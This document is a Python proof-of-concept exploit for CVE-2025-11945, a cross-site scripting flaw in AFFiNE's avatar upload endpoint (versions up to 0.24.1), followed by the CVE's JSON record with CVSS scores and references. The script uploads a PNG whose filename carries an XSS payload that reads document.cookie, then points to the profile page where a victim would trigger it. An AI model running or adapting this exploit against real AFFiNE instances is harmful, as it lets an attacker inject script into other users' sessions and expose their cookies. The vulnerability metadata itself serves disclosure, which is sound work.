CVE-2025-11945

# CVE-2025-11945 PoC - AFFiNE Avatar Upload XSS # Vulnerability: Stored/Reflected XSS via Avatar Upload Image Endpoint # Affected: AFFiNE <= 0.24.1 import requests # Target configuration TARGET_URL = "https://target-affine-instance.com" AUTH_TOKEN = "your_auth_token_here" # Low privilege account token # Malicious payload embedded in image filename # The payload will be executed when the avatar is rendered MALICIOUS_FILENAME = "<img src=x onerror=alert(document.cookie)>.png" # Create a minimal valid PNG file with malicious filename def create_malicious_avatar(): # Minimal 1x1 PNG file bytes png_data = bytes.fromhex( "89504e470d0a1a0a0000000d49484452000000010000000108060000001f15c4" "890000000d49444154789c6300010000000500010d0a2db40000000049454e44ae" "426082" ) return png_data def exploit(): session = requests.Session() session.headers.update({ "Authorization": f"Bearer {AUTH_TOKEN}", "User-Agent": "Mozilla/5.0" }) # Step 1: Upload malicious avatar upload_url = f"{TARGET_URL}/api/avatar/upload" files = { "file": (MALICIOUS_FILENAME, create_malicious_avatar(), "image/png") } response = session.post(upload_url, files=files) print(f"Upload response status: {response.status_code}") # Step 2: Trigger XSS by viewing the profile with malicious avatar # When another user views the attacker's profile, the payload executes profile_url = f"{TARGET_URL}/profile/attacker" print(f"Payload will trigger when victim visits: {profile_url}") if __name__ == "__main__": exploit()

{"cve": {"id": "CVE-2025-11945", "sourceIdentifier": "[email protected]", "published": "2025-10-19T21:15:36.433", "lastModified": "2026-04-29T01:00:01.613", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "A vulnerability was identified in toeverything AFFiNE up to 0.24.1. This vulnerability affects unknown code of the component Avatar Upload Image Endpoint. Such manipulation leads to cross site scripting. The attack may be launched remotely. The exploit is publicly available and might be used. The vendor was contacted early about this disclosure but did not respond in any way."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:P/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 2.0, "baseSeverity": "LOW", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "PASSIVE", "vulnConfidentialityImpact": "NONE", "vulnIntegrityImpact": "LOW", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "PROOF_OF_CONCEPT", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:N/I:L/A:N", "baseScore": 3.5, "baseSeverity": "LOW", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.1, "impactScore": 1.4}], "cvssMetricV2": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "2.0", "vectorString": "AV:N/AC:L/Au:S/C:N/I:P/A:N", "baseScore": 4.0, "accessVector": "NETWORK", "accessComplexity": "LOW", "authentication": "SINGLE", "confidentialityImpact": "NONE", "integrityImpact": "PARTIAL", "availabilityImpact": "NONE"}, "baseSeverity": "MEDIUM", "exploitabilityScore": 8.0, "impactScore": 2.9, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}, {"lang": "en", "value": "CWE-94"}]}], "references": [{"url": "https://drive.google.com/file/d/1L6gX0GY8cE9rS6o50oJzuMRPVMerFQNS", "source": "[email protected]"}, {"url": "https://vuldb.com/?ctiid.329025", "source": "[email protected]"}, {"url": "https://vuldb.com/?id.329025", "source": "[email protected]"}, {"url": "https://vuldb.com/?submit.670888", "source": "[email protected]"}]}}